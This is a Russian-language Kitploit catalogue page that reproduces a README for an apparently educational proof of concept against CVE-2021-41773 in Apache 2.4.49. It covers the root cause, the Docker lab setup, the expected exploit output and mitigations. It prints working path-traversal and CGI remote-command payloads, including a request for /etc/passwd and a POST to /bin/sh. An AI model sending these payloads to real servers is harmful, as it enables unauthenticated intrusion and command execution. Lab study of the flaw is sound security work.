Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773- — Комплексный анализ CVE-2021-41773 (Apache HTTP Server 2.4.49), включающий исследование уязвимости, контролируемую эксплуатацию в лабораторных условиях, разработку Proof-of-Concept, анализ первопричины и стратегии смягчения последствий для образовательных целей и целей защитного обеспечения безопасности. | Kitploit
Инструменты/GitHubGitHub/abds059/apache-path-traversal-rce-cve-2021-41773-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubabds059/apache-path-traversal-rce-cve-2021-41773-

APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773-

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Репозиторий
5 месяцев назадЕщё не проверено

Комплексный анализ CVE-2021-41773 (Apache HTTP Server 2.4.49), включающий исследование уязвимости, контролируемую эксплуатацию в лабораторных условиях, разработку Proof-of-Concept, анализ первопричины и стратегии смягчения последствий для образовательных целей и целей защитного обеспечения безопасности.

Поделиться

CVE-2021-41773 — Apache HTTP Server 2.4.49 Path Traversal / RCE

Apache CVE CVSS Python Docker Lab Only

Образовательный исследовательский проект. Все тесты проводились в изолированной Docker-лаборатории. Не используйте против систем, которые вам не принадлежат.


Сводка по уязвимости

ПолеДетали
ID CVECVE-2021-41773
Затронутое ПОТолько Apache HTTP Server 2.4.49
Тип уязвимостиPath Traversal → удалённое выполнение кода
Оценка CVSS9.8 (критическая)
РаскрытаОктябрь 2021
Исправлена вApache 2.4.51

Корневая причина

Apache 2.4.49 некорректно нормализует URL-закодированные последовательности путей (%2e%2e) перед применением правил контроля доступа. Это позволяет атакующему выйти за пределы корневого каталога веб-сервера. Когда включён CGI, направление обхода на /bin/sh и передача shell-команд в теле POST-запроса приводит к неаутентифицированному удалённому выполнению кода.


Содержимое репозитория

root@kitploit:~
cve-2021-41773-poc/
├── Dockerfile      # Намеренно уязвимый лабораторный контейнер Apache 2.4.49
├── exploit.py      # Python PoC — использует raw-сокеты для сохранения %2e-кодировки
├── SETUP.md        # Пошаговое руководство по настройке лаборатории
├── README.md       # Этот файл
└── report.pdf      # Полный отчёт о разработке эксплойта

Быстрый старт

1. Сборка и запуск уязвимого контейнера

root@kitploit:~
docker build -t apache-vuln-2449 .
docker run -d -p 8080:80 --name vuln-apache apache-vuln-2449

2. Запуск эксплойта

root@kitploit:~
python3 exploit.py

3. Ожидаемый вывод

root@kitploit:~
==================================================
 CVE-2021-41773 PoC — Lab Use Only
==================================================
[+] Target reachable — HTTP 200

[*] Path Traversal — Reading /etc/passwd
[*] Status: 403
[-] Blocked (403) — server restrictions in place

[*] RCE — Executing: id
[*] Status: 200
[+] OUTPUT:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

[*] RCE — Executing: whoami
[*] Status: 200
[+] OUTPUT:
daemon

[*] RCE — Executing: hostname
[*] Status: 200
[+] OUTPUT:
e4ccca07bee7

См. SETUP.md с полными инструкциями по настройке и устранению неполадок.


Как работает эксплойт

Библиотека requests нормализует %2e → . перед отправкой, что ломает эксплойт (возвращает 400). Этот PoC использует raw-сокеты для отправки HTTP-запроса байт-в-байт, сохраняя закодированную последовательность обхода ровно в том виде, в котором Apache 2.4.49 должен её получить.

Payload для обхода пути:

root@kitploit:~
GET /.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1

Payload для RCE:

root@kitploit:~
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
...
echo Content-Type: text/plain; echo; id

Apache не декодирует %2e%2e перед проверками ACL, обрабатывает запрос, направляет его через CGI и выполняет тело POST-запроса как shell-команду.


Меры по устранению

  • Обновите Apache до версии 2.4.51 или новее
  • Отключите CGI, если он строго не требуется
  • Никогда не используйте Require all granted для /
  • Своевременно устанавливайте исправления безопасности после их выпуска

Ссылки

  • CVE-2021-41773 — MITRE
  • Apache Security Advisory
  • ExploitDB #50383
  • Rapid7 Analysis
  • PayloadsAllTheThings

Автор

Abdur Rehman Siddiqui
Разработка эксплойта — Задание 3


Этот репозиторий предназначен только для образовательных целей. Автор не несёт ответственности за любое неправомерное использование данного материала.

Скачать инструмент